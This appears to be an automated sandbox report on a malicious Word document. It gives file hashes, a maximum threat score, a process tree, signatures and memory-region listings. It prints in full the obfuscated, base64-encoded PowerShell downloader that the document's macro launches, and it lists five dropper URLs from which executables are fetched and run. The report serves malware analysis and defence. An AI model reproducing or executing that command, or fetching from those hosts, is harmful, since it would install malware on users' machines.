Analysis

  • max time kernel
    122s
  • max time network
    81s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    30-06-2022 23:44

General

  • Target

    0d10fe705e970034049229c93062cce13a3c212827b5a94aa9bd51764fac480f.doc

  • Size

    164KB

  • MD5

    08414b384969c9d4ec135bc4a004c6af

  • SHA1

    78f72141913a72d3fee22fc5f55ab755e178e1c0

  • SHA256

    0d10fe705e970034049229c93062cce13a3c212827b5a94aa9bd51764fac480f

  • SHA512

    d03fc15642df0227ae69fcc1ee77677c27177f50e61c3401c072d01a8a333ecf60b44e80cc1ab1ea89b678ac81b391f88e7c645339cdfb7834c0bd08daf4232c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://grcklasik.com/ytpawk3j4/qN3P/

exe.dropper

http://eurocasinolive.com/test/paAQL7/

exe.dropper

http://heuveling.net/9op/

exe.dropper

http://haru1ban.net/files/Ep/

exe.dropper

http://netwebshosting.com/whmcs/DjM/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0d10fe705e970034049229c93062cce13a3c212827b5a94aa9bd51764fac480f.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABjADQAYwBHADEAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAGMAUQAnACwAJwBJAEcAXwAnACkAOwAkAFcARABBAEMAQQBRAHcAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwB0ACcAKQAgACgAJwBOAGUAJwArACcAdAAuAFcAJwArACcAZQBiACcAKwAnAEMAJwArACcAbABpAGUAbgB0ACcAKQA7ACQAWABYAFUAQQBBAEIAPQAoACIAewAyAH0AewA4AH0AewA0AH0AewAzADcAfQB7ADEAfQB7ADMANgB9AHsANAAwAH0AewA5AH0AewAzADUAfQB7ADEANQB9AHsAMgA1AH0AewAxADgAfQB7ADIANwB9AHsAMQA5AH0AewAzAH0AewAxADMAfQB7ADAAfQB7ADIAMAB9AHsANAA1AH0AewAzADEAfQB7ADEAMgB9AHsANAAxAH0AewAzADIAfQB7ADIAMgB9AHsAMgA4AH0AewAxADEAfQB7ADIANgB9AHsANwB9AHsAMQA2AH0AewA2AH0AewAzADMAfQB7ADIAMQB9AHsANAA0AH0AewAxADcAfQB7ADMANAB9AHsAMgA5AH0AewA1AH0AewAxADQAfQB7ADIANAB9AHsAMQAwAH0AewAyADMAfQB7ADMAOAB9AHsAMwAwAH0AewA0ADIAfQB7ADQAMwB9AHsAMwA5AH0AIgAtAGYAIAAnAG8AYwAnACwAJwBtACcALAAnAGgAdAB0ACcALAAnAGgAdAB0ACcALAAnAC4AJwAsACcALwBuAGUAJwAsACcALwAvACcALAAnAEAAaAB0AHQAcAAnACwAJwBwADoALwAvAGcAcgBjAGsAbABhAHMAaQBrACcALAAnAGEAdwAnACwAJwBlAGIAcwBoAG8AcwB0AGkAbgBnAC4AYwBvAG0ALwAnACwAJwAvADkAbwBwACcALAAnAHAAYQBBAFEATAA3AC8AQAAnACwAJwBwADoALwAvAGUAdQByACcALAAnAHQAJwAsACcAagA0ACcALAAnADoAJwAsACcALgBuAGUAJwAsACcATgAnACwAJwBQAC8AQAAnACwAJwBhAHMAaQBuAG8AbABpAHYAZQAuAGMAbwBtAC8AdAAnACwAJwBhACcALAAnAC8ALwBoACcALAAnAHcAaAAnACwAJwB3ACcALAAnAC8AcQAnACwAJwAvACcALAAnADMAJwAsACcAZQB1AHYAZQBsAGkAbgBnAC4AbgBlAHQAJwAsACcALwAnACwAJwBjAHMAJwAsACcALwAnACwAJwA6ACcALAAnAGgAJwAsACcAdAAvAGYAaQBsAGUAcwAvAEUAcAAvAEAAaAB0AHQAcAA6ACcALAAnAGsAMwAnACwAJwAvAHkAdAAnACwAJwBjAG8AJwAsACcAbQAnACwAJwAvACcALAAnAHAAJwAsACcAaAB0AHQAcAAnACwAJwAvAEQAJwAsACcAagBNACcALAAnAHIAdQAxAGIAYQBuACcALAAnAGUAcwB0ACcAKQAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGgAQQB3ADQARABvAGMAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARAAnACwAJwBqAEEAWABBAF8AJwApADsAJABJAEIAVQBEAEEARwBaAEMAIAA9ACAAJwAzADQANAAnADsAJABBAFgAQQBBAEEAawA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAVQBaAFEAJwAsACcAQQBCAG8AJwApADsAJABWAEMAeABRAHcAQgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQBCAFUARABBAEcAWgBDACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAJwAsACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEgAQgBBAEcAQQBRACAAaQBuACAAJABYAFgAVQBBAEEAQgApAHsAdAByAHkAewAkAFcARABBAEMAQQBRAHcALgAoACIAewAyAH0AewAwAH0AewAzAH0AewAxAH0AIgAgAC0AZgAnAG4AbABvAGEAJwAsACcAZQAnACwAJwBEAG8AdwAnACwAJwBkAEYAaQBsACcAKQAuAEkAbgB2AG8AawBlACgAJABIAEIAQQBHAEEAUQAsACAAJABWAEMAeABRAHcAQgApADsAJABCAEcAVQBDAFgAQQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcANABRAEcANAAnACwAJwA0AEEAJwAsACcAaQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAVgBDAHgAUQB3AEIAKQAuACIAbABlAG4AYABHAHQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrACcAKwAnAGUALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVgBDAHgAUQB3AEIAOwAkAHMAUQBaAEEAQQBYAGsAQQA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBZAG8AQQBEADEAJwAsACcAUQBBACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABqAEEAQwBEAEIAQQBBAD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAQQBBACcALAAnAEEAVQAnACwAJwBKAEQAVQAnACkAOwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:680

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/680-65-0x000007FEF4970000-0x000007FEF5393000-memory.dmp

      Filesize

      10.1MB

    • memory/680-71-0x000000000294B000-0x000000000296A000-memory.dmp

      Filesize

      124KB

    • memory/680-70-0x000000000294B000-0x000000000296A000-memory.dmp

      Filesize

      124KB

    • memory/680-69-0x0000000002944000-0x0000000002947000-memory.dmp

      Filesize

      12KB

    • memory/680-68-0x000000000294B000-0x000000000296A000-memory.dmp

      Filesize

      124KB

    • memory/680-66-0x000007FEF3D50000-0x000007FEF48AD000-memory.dmp

      Filesize

      11.4MB

    • memory/680-67-0x0000000002944000-0x0000000002947000-memory.dmp

      Filesize

      12KB

    • memory/800-62-0x0000000000725000-0x0000000000729000-memory.dmp

      Filesize

      16KB

    • memory/800-54-0x0000000072FA1000-0x0000000072FA4000-memory.dmp

      Filesize

      12KB

    • memory/800-63-0x0000000000725000-0x0000000000729000-memory.dmp

      Filesize

      16KB

    • memory/800-61-0x0000000071A0D000-0x0000000071A18000-memory.dmp

      Filesize

      44KB

    • memory/800-60-0x0000000071A0D000-0x0000000071A18000-memory.dmp

      Filesize

      44KB

    • memory/800-57-0x00000000765F1000-0x00000000765F3000-memory.dmp

      Filesize

      8KB

    • memory/800-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/800-55-0x0000000070A21000-0x0000000070A23000-memory.dmp

      Filesize

      8KB

    • memory/800-72-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/800-73-0x0000000071A0D000-0x0000000071A18000-memory.dmp

      Filesize

      44KB

    • memory/1348-59-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

      Filesize

      8KB